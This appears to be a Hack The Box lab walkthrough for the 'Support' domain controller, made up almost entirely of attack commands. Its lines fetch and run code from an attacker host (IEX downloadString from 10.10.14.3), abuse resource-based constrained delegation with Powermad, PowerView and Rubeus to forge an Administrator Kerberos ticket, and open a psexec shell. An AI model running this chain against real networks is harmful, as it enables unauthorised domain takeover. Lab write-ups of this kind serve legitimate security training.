*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')
Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
The quota is 10, so up to 10 machine accounts can be created.
New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
.\Rubeus.exe hash /password:adot8
.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt
Paste the base64 ticket output into ticket.kirbi.b64 and remove any whitespace.
base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass support.htb/administrator@DC.SUPPORT.HTB